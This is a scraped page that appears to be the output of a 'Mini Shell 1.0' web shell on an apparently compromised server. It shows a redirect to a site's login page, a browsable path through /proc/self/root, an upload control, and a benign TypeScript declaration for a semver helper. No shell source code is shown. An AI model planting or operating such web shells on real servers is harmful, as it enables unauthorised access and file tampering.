HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/share/node_modules/@types/semver/ranges/
Upload File :
Current File : //proc/self/root/usr/share/node_modules/@types/semver/ranges/to-comparators.d.ts
import Range = require('../classes/range');
import semver = require('../index');

/**
 * Mostly just for testing and legacy API reasons
 */
declare function toComparators(range: string | Range, optionsOrLoose?: boolean | semver.Options): string[][];

export = toComparators;